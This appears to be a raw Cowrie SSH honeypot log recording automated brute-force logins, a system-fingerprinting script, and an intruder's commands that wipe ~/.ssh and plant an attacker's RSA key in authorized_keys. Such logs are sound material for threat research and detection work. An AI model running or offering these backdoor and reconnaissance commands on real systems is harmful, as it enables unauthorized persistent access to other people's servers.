{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:03:42.966818Z","src_ip":"212.227.235.229","session":"d975de675602"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:03:43.999289Z","src_ip":"212.227.235.229","session":"d975de675602"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:45.268665Z","src_ip":"212.227.235.229","session":"d975de675602"}
{"eventid":"cowrie.login.success","username":"root","password":"Mcjr","message":"login attempt [root/Mcjr] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:03:47.321053Z","src_ip":"201.148.180.50","session":"bdd0607f0aae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33834,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f1b66e384c4","protocol":"ssh","message":"New connection: 212.227.235.229:33834 (1.2.3.4:22) [session: 5f1b66e384c4]","sensor":"my-vps","timestamp":"2025-08-31T05:03:48.140422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:03:48.141742Z","src_ip":"212.227.235.229","session":"5f1b66e384c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:03:48.416649Z","src_ip":"212.227.235.229","session":"5f1b66e384c4"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:03:48.430556Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53732,"dst_ip":"1.2.3.4","dst_port":22,"session":"7efa262bca65","protocol":"ssh","message":"New connection: 212.227.235.229:53732 (1.2.3.4:22) [session: 7efa262bca65]","sensor":"my-vps","timestamp":"2025-08-31T05:03:48.559550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:03:48.560313Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:03:48.823519Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"smoker666","message":"login attempt [daemon/smoker666] failed","sensor":"my-vps","timestamp":"2025-08-31T05:03:49.556947Z","src_ip":"212.227.235.229","session":"5f1b66e384c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:03:49.662237Z","src_ip":"201.148.180.50","session":"bdd0607f0aae"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T05:03:49.662925Z","src_ip":"201.148.180.50","session":"bdd0607f0aae"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz2wsx3edc","message":"login attempt [root/!qaz2wsx3edc] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:03:49.924073Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:03:50.090133Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.091004Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.091911Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.093115Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.094298Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.095407Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.096235Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.097779Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.098538Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.099422Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.100088Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.100818Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.101432Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:03:50.465795Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.466594Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.467431Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.728681Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.834409Z","src_ip":"212.227.235.229","session":"5f1b66e384c4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.897790Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.898788Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:50.900122Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:03:51.311267Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:03:51.311943Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:51.418806Z","src_ip":"201.148.180.50","session":"bdd0607f0aae"}
{"eventid":"cowrie.session.closed","duration":"12.8","message":"Connection lost after 12.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:51.419822Z","src_ip":"201.148.180.50","session":"bdd0607f0aae"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:03:51.575197Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:51.576065Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55944,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b97ed9b12d1","protocol":"ssh","message":"New connection: 212.227.235.229:55944 (1.2.3.4:22) [session: 2b97ed9b12d1]","sensor":"my-vps","timestamp":"2025-08-31T05:03:51.835209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:03:51.835959Z","src_ip":"212.227.235.229","session":"2b97ed9b12d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:03:52.093955Z","src_ip":"212.227.235.229","session":"2b97ed9b12d1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:03:53.174357Z","src_ip":"212.227.235.229","session":"2b97ed9b12d1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:54.438226Z","src_ip":"212.227.235.229","session":"2b97ed9b12d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55960,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c8d9699d25e","protocol":"ssh","message":"New connection: 212.227.235.229:55960 (1.2.3.4:22) [session: 4c8d9699d25e]","sensor":"my-vps","timestamp":"2025-08-31T05:03:54.702081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:03:54.704608Z","src_ip":"212.227.235.229","session":"4c8d9699d25e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:03:55.975383Z","src_ip":"212.227.235.229","session":"4c8d9699d25e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:03:57.034651Z","src_ip":"212.227.235.229","session":"4c8d9699d25e"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:57.299992Z","src_ip":"212.227.235.229","session":"7efa262bca65"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:57.301248Z","src_ip":"212.227.235.229","session":"4c8d9699d25e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"32.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 32.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:57.440587Z","src_ip":"212.227.125.160","session":"d66fab5c0710"}
{"eventid":"cowrie.session.closed","duration":"92.5","message":"Connection lost after 92.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:57.694846Z","src_ip":"212.227.125.160","session":"d66fab5c0710"}
{"eventid":"cowrie.session.closed","duration":"32.5","message":"Connection lost after 32.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:58.325917Z","src_ip":"212.227.125.160","session":"fb0ecb513870"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50216,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ae3f8dfb176","protocol":"ssh","message":"New connection: 212.227.125.160:50216 (1.2.3.4:22) [session: 8ae3f8dfb176]","sensor":"my-vps","timestamp":"2025-08-31T05:04:02.937313Z"}
